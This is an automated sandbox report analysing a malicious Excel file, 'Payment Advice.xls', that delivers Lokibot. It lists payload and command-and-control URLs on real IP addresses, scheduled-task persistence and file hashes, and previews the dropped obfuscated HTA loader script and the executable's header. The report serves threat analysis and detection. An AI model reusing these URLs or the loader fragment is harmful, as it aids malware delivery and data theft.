http://go.micros	powershell.exe, 00000004.00000002.458561358.000000000362C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.508901590.00000000023AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback	mshta.exe, 0000001B.00000003.496179630.0000000000347000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.502762634.0000000000347000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500554359.0000000000347000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://192.3.243.136/55/caspol.exehR	powershell.exe, 00000020.00000002.514413373.000000001A921000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000004.00000002.476910335.00000000122A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.476910335.00000000122A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://provit.uk/l	mshta.exe, 00000003.00000003.435047316.0000000002EE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436209780.0000000002EE5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaC:	mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.496179630.0000000000320000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.502762634.000000000030F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500554359.000000000030F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://provit.uk/m	mshta.exe, 00000003.00000002.435279648.00000000002EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.428761225.00000000002EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://192.3.243.136/G	mshta.exe, 00000003.00000003.435047316.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002F30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestiony	mshta.exe, 00000003.00000002.435279648.0000000000293000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://192.3.243.136/55/caspol.exep	powershell.exe, 00000004.00000002.458561358.0000000002471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.508901590.00000000027C2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.458561358.0000000002271000.00000004.00000800.00020000.00000000.sdmp, caspol.exe, 0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp, rrwscqkDSNwLK.exe, 00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.508901590.00000000021A1000.00000004.00000800.00020000.00000000.sdmp, caspol.exe, 00000026.00000002.521745437.0000000002491000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.comodo.com/CPS0	mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	false		high
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaht	mshta.exe, 00000003.00000003.430819183.0000000002975000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.434304594.0000000002975000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500182672.0000000003035000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498539756.0000000003035000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionyX	mshta.exe, 0000001B.00000002.502762634.00000000002AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
198.244.140.41	provit.uk	United States	18630	RIDLEYSD-NETUS	false
192.3.243.136	unknown	United States	36352	AS-COLOCROSSINGUS	true
94.156.177.41	unknown	Bulgaria	43561	NET1-ASBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1559865
Start date and time:	2024-11-21 01:19:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	48
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment Advice.xls
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winXLS@53/60@10/3
EGA Information:	Successful, ratio: 71.4%
HCA Information:	Successful, ratio: 99% Number of executed functions: 129 Number of non-executed functions: 10
Cookbook Comments:	Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
Execution Graph export aborted for target mshta.exe, PID 3644 because there are no executed function
Execution Graph export aborted for target mshta.exe, PID 3768 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
16:20:55	Task Scheduler	Run new task: rrwscqkDSNwLK path: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
19:20:32	API Interceptor	155x Sleep call for process: mshta.exe modified
19:20:38	API Interceptor	338x Sleep call for process: powershell.exe modified
19:20:51	API Interceptor	1212x Sleep call for process: caspol.exe modified
19:20:52	API Interceptor	105x Sleep call for process: AcroRd32.exe modified
19:20:54	API Interceptor	6x Sleep call for process: schtasks.exe modified
19:20:55	API Interceptor	400x Sleep call for process: taskeng.exe modified
19:20:57	API Interceptor	28x Sleep call for process: rrwscqkDSNwLK.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
198.244.140.41	pi-77159.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse
	Transferencia SPEI.xls	Get hash	malicious	FormBook, HTMLPhisher	Browse
	PO-000041492.docx.doc	Get hash	malicious	Lokibot	Browse
	Credit_DetailsCBS24312017918.xla.xlsx	Get hash	malicious	HTMLPhisher	Browse
	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse
192.3.243.136	greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	192.3.243.136/55/caspol.exe
	givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	192.3.243.136/37/caspol.exe
	seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	192.3.243.136/36/caspol.exe
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	192.3.243.136/xampp/de/givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	192.3.243.136/xampp/rf/seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe.hta
	kissmegoodthingwhichgivemebestthignswithgirluaremy.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	192.3.243.136/32/SMPLLS.txt
	bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer	Browse	192.3.243.136/33/LOGLK.txt
	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	192.3.243.136/32/SMPLLS.txt
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	192.3.243.136/33/LOGLK.txt
94.156.177.41	stthigns.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	goodtoseeuthatgreatthingswithentirethingsgreatfor.hta	Get hash	malicious	Cobalt Strike, Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	PO-000041492.docx.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	ECxDwGGFH3.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/simple/five/fre.php
	greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	94.156.177.41/simple/five/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
provit.uk	pi-77159.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	198.244.140.41
	Transferencia SPEI.xls	Get hash	malicious	FormBook, HTMLPhisher	Browse	198.244.140.41
	PO-000041492.docx.doc	Get hash	malicious	Lokibot	Browse	198.244.140.41
	Credit_DetailsCBS24312017918.xla.xlsx	Get hash	malicious	HTMLPhisher	Browse	198.244.140.41
	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse	198.244.140.41

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	seethebestthignswhichgivingbestopportunities.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	192.3.101.149
	generatethebstgoodpeoplesaroundtheworldwithgood.hta	Get hash	malicious	Cobalt Strike, FormBook, HTMLPhisher	Browse	107.173.4.61
	pi-77159.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	192.3.101.149
	Transferencia SPEI.xls	Get hash	malicious	FormBook, HTMLPhisher	Browse	107.173.4.61
	seethebestthingswithgreatsituationshandletotheprogress.hta	Get hash	malicious	Cobalt Strike, AgentTesla, HTMLPhisher	Browse	192.3.22.13
	greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	192.3.243.136
	Credit_DetailsCBS24312017918.xla.xlsx	Get hash	malicious	HTMLPhisher	Browse	172.245.123.3
	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse	192.3.22.13
	9srIKeD54O.rtf	Get hash	malicious	Unknown	Browse	192.3.101.150
NET1-ASBG	stthigns.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41
	goodtoseeuthatgreatthingswithentirethingsgreatfor.hta	Get hash	malicious	Cobalt Strike, Lokibot	Browse	94.156.177.41
	PO-000041492.docx.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41
	ECxDwGGFH3.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41
	greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	94.156.177.41
	WjcXwIcclB.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41
	0aA7F59xDl.exe	Get hash	malicious	Lokibot	Browse	94.156.177.95
	givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	94.156.177.95
	seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	94.156.177.95
RIDLEYSD-NETUS	pi-77159.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	198.244.140.41
	Transferencia SPEI.xls	Get hash	malicious	FormBook, HTMLPhisher	Browse	198.244.140.41
	PO-000041492.docx.doc	Get hash	malicious	Lokibot	Browse	198.244.140.41
	Credit_DetailsCBS24312017918.xla.xlsx	Get hash	malicious	HTMLPhisher	Browse	198.244.140.41
	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse	198.244.140.41
	nabspc.elf	Get hash	malicious	Unknown	Browse	198.244.7.173
	https://instagrambeta.github.io/	Get hash	malicious	HTMLPhisher	Browse	198.244.231.90
	SecuriteInfo.com.Trojan.WinGo.Agent.27329.6060.exe	Get hash	malicious	Unknown	Browse	198.244.179.42
	Informations.bat	Get hash	malicious	PureLog Stealer, XWorm	Browse	198.244.206.37

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
7dcce5b76c8b17472d024758970a406b	Fax-494885 Boswell Automotive Group.xlsx	Get hash	malicious	Unknown	Browse	198.244.140.41
	pi-77159.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	198.244.140.41
	Transferencia SPEI.xls	Get hash	malicious	FormBook, HTMLPhisher	Browse	198.244.140.41
	PO-000041492.docx.doc	Get hash	malicious	Lokibot	Browse	198.244.140.41
	Credit_DetailsCBS24312017918.xla.xlsx	Get hash	malicious	HTMLPhisher	Browse	198.244.140.41
	PO-000041492.xls	Get hash	malicious	Unknown	Browse	198.244.140.41
	Credit_DetailsCBS24312017915.xla.xlsx	Get hash	malicious	Unknown	Browse	198.244.140.41
	PO-000041492.xls	Get hash	malicious	Unknown	Browse	198.244.140.41
	Credit_DetailsCBS24312017915.xla.xlsx	Get hash	malicious	Unknown	Browse	198.244.140.41

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)	ECxDwGGFH3.exe	Get hash	malicious	Lokibot	Browse
C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)	greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe	ECxDwGGFH3.exe	Get hash	malicious	Lokibot	Browse
	greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4742
Entropy (8bit):	4.8105940880640246
Encrypted:	false
SSDEEP:	96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
MD5:	278C40A9A3B321CA9147FFBC6BE3A8A8
SHA1:	D795FC7D3249F9D924DC951DA1DB900D02496D73
SHA-256:	4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
SHA-512:	E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
Malicious:	false
Preview:	PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with very long lines (65536), with no line terminators
Category:	modified
Size (bytes):	182352
Entropy (8bit):	2.3378885496144393
Encrypted:	false
SSDEEP:	96:4vCl17HUofTaTGoHTapZR3CyYaMJhS1i3hTaNopQ:4vCldHULTG3pZLYKi3gN2Q
MD5:	4CE3B0E612E1968B6C491AB1AB818884
SHA1:	CBC890A816E9B7E993C90FB63D51526A76616323
SHA-256:	A786CB2AE0DC8117E3BFC07BCA8BB0E5D4545AB8F5B4AA042C9EE85DCA7B43A0
SHA-512:	9B87141B10A2E781E51483DCED485817AEB34B545F6DBF64803B4B3621CD4DD74587A5033AB1AA3B931FBD39BC7C77650A0CCDD6B4132B48FBEAB9D0FBB3D816
Malicious:	true
Yara Hits:	Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta, Author: Joe Security
Preview:	<script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252522%2525253C%25252521DOCTYPE%25252520html%2525253E%2525250A%2525253Cmeta%25252520http-equiv%2525253D%25252522X-UA-Compatible%25252522%25252520content%2525253D%25252522IE%2525253DEmulateIE8%25252522%25252520%2525253E%2525250A%2525253Chtml%2525253E%2525250A%2525253Cbody%2525253E%2525250A%2525253CscRipt%25252520Type%2525253D%25252522TexT/vbsCRipT%25252522%2525253E%2525250ADim%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	600576
Entropy (8bit):	7.915042903583073
Encrypted:	false
SSDEEP:	12288:frO3+Ri3AgFdygxDJz5WFux50+KnCKmfRLdW3Kt9c+O7:LQ3AgyKJdG+wmNdsKM+O7
MD5:	74061922F1E78C237A66D12A15A18181
SHA1:	E31EE444AAA552A100F006E43F0810497A3B0387
SHA-256:	89BF888148EAE2CAABDC6D3FFF98054127B197B402493581894A3104ED6B6F1C
SHA-512:	306744107D78B02ECFD28252DAE954F0B47C1F761E15A33C937474A2E15284C17BB7E2542618B745EA5F95E5A7DBA3D27B675C8837914A44D8B5B350A3D4A136
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Joe Sandbox View:	Filename: ECxDwGGFH3.exe, Detection: malicious, Browse Filename: greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5=g..............0...... .......'... ...@....@.. ....................................`..................................&..O....@..\|....................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...\|....@......................@..@.reloc.......`.......(..............@..B.................'......H........6...(...........^..(.............................................(......}.....{....r...p .....o5....{....o7...&....0...........{......o9.....}........&.......................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=..............+..E..........\b......2.{....oA...n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2638FAB5.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1296688
Entropy (8bit):	3.5918072584048746
Encrypted:	false
SSDEEP:	6144:jFN83s01u2uIfTlw35Yskndm9wHiT53ZkyOmCl6PV2yuxOKGOKU:T0WQTi35qH1RW7vC7
MD5:	BA00B12DCCFF01901C2C8A39552A9A9F
SHA1:	A084B7B0250ADECDB80BD6EF74C65311CC7F219B
SHA-256:	763EAA35D9284478BF52568C3DF2960FEAD4579659E67313EA71204CFF2BEFB2
SHA-512:	3318786F60A41B4D6EFFDECEC0729EF9F55414AD14F0A498474E04AF7419A16C10F6ACC643D5A393C42160F17A89DF4FDF509E205D7207DB2A9E5C284F9DF4EB
Malicious:	false
Preview:	....l...........................6[...%.. EMF....0.......$.......................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......1.......Z.......1.......*...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\30ADB069.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	3191264
Entropy (8bit):	2.0118490192617995
Encrypted:	false
SSDEEP:	6144:nA0Ki15RlURvLuky+NkuCVAKERludvLuk0Vgk9CVnOKAOK1:P5RlMHk5ERlyDkr8a
MD5:	04A17584C7203C47419D4AC2163B98C6
SHA1:	485E17A82AE4672AC8D4B542CA0F509B80C0C4DF
SHA-256:	EBA2B7C929B2EAA16FB1F733B7ACDDDFD80635A7211B3FBE400FF2796C17827E
SHA-512:	043092951F27E81FF96DA084E8112107D6F00DAEE83ADA80132BEC696E56309D16FDDED39F7F3810CA58BB6357CC6A75718CDD2F7B4342CF82D0421B7681A88C
Malicious:	false
Preview:	....l...........@................S...".. EMF.....0.....#...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......<.......m.......<.......2...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9420975F.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7440
Entropy (8bit):	5.6312448977812695
Encrypted:	false
SSDEEP:	96:PV1Ipi7blJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHDx:PVxvTNAK4oOIGbK1RvVwPAWmOHDx
MD5:	DEA1DEA8BEA479821FA2AC1C565B6E56
SHA1:	86865637336A9FEFA98AC5ABD189A848BE8852D4
SHA-256:	64832E2264B5A851EE2CC7E048DA437D6F41B1C3DCAA385971DAA1B502A11125
SHA-512:	1E1858F58748BF88DAB254F524943AC2C8576B4546AA67E37DFFE8917396A1CCCBA3964554AA77C599DD1CA184A56B8AFC3406A14C880A1B88D163EB04BACA1C
Malicious:	false
Preview:	....l........... ...<...........w....... EMF................................8...X....................?..............................@...C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.......d............................Xt....\.............L...7.Xt........].v?.Xt......Xt.......w8.....9............w....$.......d...........*XYt.....XYtH...8....d....9.-...4...6=.w................<.fv.[Sw....X..V..............................Twdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF4A9302.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1504468
Entropy (8bit):	1.7693060102813485
Encrypted:	false
